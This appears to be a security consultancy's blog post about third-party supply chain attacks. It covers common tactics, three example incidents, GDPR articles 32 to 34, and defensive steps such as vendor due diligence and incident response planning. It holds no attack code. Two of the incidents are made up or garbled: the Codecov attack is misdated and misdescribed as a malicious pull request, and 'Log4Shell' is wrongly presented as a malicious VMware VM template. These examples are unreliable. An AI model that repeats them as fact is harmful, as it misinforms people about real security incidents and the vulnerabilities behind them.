• By Kammil Mahajan
• Jan 09, 2024

Prevent data breaches and financial losses with proactive third-party vendor security measures

Supply chain attacks are a serious threat to organisations of all sizes. They happen when attackers target the companies that provide services or products to a business, rather than the business itself. Once attackers gain access to a supplier's system, they can use it to steal sensitive data or install malware on the target company's systems. Few tactics are common in this specific type of attack such as:

Social engineering: This involves tricking employees or suppliers into giving up sensitive information or clicking on malicious links.

Zero-day exploits: These are vulnerabilities in software that the software vendor is not aware of and that have not yet been fixed.

Supply chain manipulation: This involves modifying or tampering with software or hardware components during the manufacturing or distribution process.

Few Examples

Codecov supply chain attack (June 2023)

• Targeted company: Codecov, a software company that provides continuous integration and continuous delivery (CI/CD) services.
• Third-party involved: The attackers compromised Codecov's pull request system, allowing them to distribute a malicious pull request.
• Malicious pull request: The malicious pull request contained code that could be used to install a backdoor on the systems of organisations that used Codecov.

VMware supply chain attack (April 2022)

• Targeted company: VMware, a software company that develops virtualization software.
• Third-party involved: The attackers compromised the VMware Workstation Player software, allowing them to distribute a malicious virtual machine (VM) template called "Log4Shell".
• Malicious VM template: Log4Shell was a VM template that contained malicious code that could be used to install a backdoor on the systems of organisations that used it.

SolarWinds Orion attack (December 2020)

• Targeted company: SolarWinds, a software company that develops IT management tools.
• Third-party involved: The attackers compromised SolarWinds' Orion software update mechanism, allowing them to install malicious code on the systems of thousands of organisations, including government agencies and Fortune 500 companies.

REFERENCE: The Supply Chain Security in GDPR

The following articles are addressing Supply Chain Security:

Article 32: This article requires data controllers to implement appropriate technical and organisational measures to ensure a level of security appropriate to the risk, including pseudonymization and encryption.

Article 33: This article mandates that data controllers notify the supervisory authority within 72 hours of becoming aware of a personal data breach unless the breach is unlikely to result in a risk to the rights and freedoms of individuals.

Article 34: This article requires data controllers to notify data subjects of a personal data breach without undue delay unless the breach is unlikely to result in a high risk to the rights and freedoms of individuals.

To protect against supply chain attacks, businesses can take the following steps:

Perform thorough due diligence on vendors: This includes assessing their security practices and background. A simple set of security-related questionnaires will help you understand your vendor's security posture.

Implement supply chain visibility: This involves monitoring and tracking the movement of sensitive data and software components throughout the supply chain.

Proactively identify and patch vulnerabilities: This includes using vulnerability scanning tools and patching software updates promptly.

Educate employees on cybersecurity best practices: This includes training them to identify and report suspicious activity.

Develop an incident response plan: This plan should outline how the organisation will respond to and recover from a supply chain attack.

At AdviceBytes, we conduct a thorough assessment of third-party suppliers and vendors and provide guidance to address the associated risks. 

One of the basic things we look into is having a legal and contractual agreement with your third-party suppliers.

"Protect your business's reputation and integrity with vigilant third-party vendor security checks."